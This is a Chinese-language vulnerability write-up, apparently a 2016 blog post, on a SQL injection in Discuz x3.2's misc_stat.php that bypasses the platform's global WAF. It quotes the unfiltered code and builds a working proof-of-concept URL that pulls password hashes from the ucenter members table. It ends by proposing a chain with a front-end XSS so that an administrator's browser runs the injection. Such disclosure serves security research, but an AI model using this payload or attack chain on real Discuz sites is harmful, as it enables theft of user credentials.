PHITHON的公开漏洞Discuz x3.2前台GET型SQL注入漏洞(绕过全局WAF) 2016-09-06
Discuz x3.2前台GET型SQL注入漏洞(绕过全局WAF)
/source/include/misc/misc_stat.php 46行:
1 | if(!empty($_GET['xml'])) { |
见这一句:
1 | $field = 'daytime,`'.implode('`+`', $_GET['types']).'` AS statistic'; |
将$_GET['type']
数组直接用`+`分割,并没有过滤。因为位置在$field
的地方,并不在单引号中,所以不用引入单引号,也无需考虑addslashes。
现在遇到另一个问题,怎么绕过discuz3.2的WAF?
不绕过也没法出数据。
我们先看看输出点在何处:http://localhost/bbs/misc.php?mod=stat&op=trend&xml=1&merge=1&types[1]=x
也就是说我们可以控制的部分有很多。
且不看全局防注入源码,黑盒试一下我发现一旦出现’、(就会拦截,而且注释符(#、–)也会拦截。
括号不能有,就特别拙计,因为很多盲注需要括号,子查询也需要括号,函数也需要括号,这里都不能用了。
1 | SELECT daytime,`aaa` AS statistic FROM common_stat WHERE daytime>=20140805 AND daytime<=20140904 ORDER BY daytime |
我们再看上述sql语句,发现我们可控的部分前面,还有个daytime。这就愁坏我了,因为我要查询的表是用户表,而用户表根本没这个字段。
执行会提示Unknown column ‘daytime’ in ‘field list’。
所以,我们可以利用mysql的特性,一次查询两个表,将pre_ucenter_members的数据连带着查询出来:
大家可以看到,已经不报错了。因为pre_common_statuser表中存在daytime
这个列。而且这个表中也有uid这个列,正好可以作为pre_ucenter_members的筛选项。
那么,有的同学再问,sql语句后半部分
1 | ` AS statistic FROM common_stat WHERE daytime>=20140805 AND daytime<=20140904 ORDER BY daytime |
没有注释符怎么处理?
这里有个巧合,在某些情况下,`能作为注释符用。因为mysql会自动给sql语句结尾没有闭合的`闭合掉,这样,只要让mysql人为后面那一大串字符是一个字段的“别名”即可。
所以,先构造一个url:
1 | http://localhost/bbs/misc.php?mod=stat&op=trend&xml=1&merge=1&types[1]=password`as%20daytime%20from%20pre_common_statuser,pre_ucenter_members%20as |
可以看到已经出数据了。但发现出来的数据只有4位。
原因是,在源码中使用了substr取了daytime的第4到8位:
1 | $xaxis .= "<value xid='$count'>".substr($value['daytime'], 4, 4)."</value>";` |
我们看下有没其他的输出点。于是找到了一个:
1 | if(empty($_GET['types']) || !empty($_GET['merge'])) { |
这个if语句,其中$type
为statistic,而将$value[$type]
的值输出了。所以,我只需将password取个别名叫statistic,就能输出password了。
那么,最后的poc就是:
1 | http://localhost/bbs/misc.php?mod=stat&op=trend&xml=1&merge=1&types[1]=password`as%20statistic%20from%20pre_common_statuser,pre_ucenter_members%20as |
本地测试效果:
这个漏洞鸡肋之处在于,虽然它是一个前台的注入(无需登录后台),但是却需要管理员权限。
所以,利用方法就是找到一个前台xss,管理员(前台管理)访问以后用javascript获得访问到的页面内容,即可获得注入出的信息。使鸡肋漏洞变得不再鸡肋。
或者利用某些浏览器的跨域漏洞,也能注入。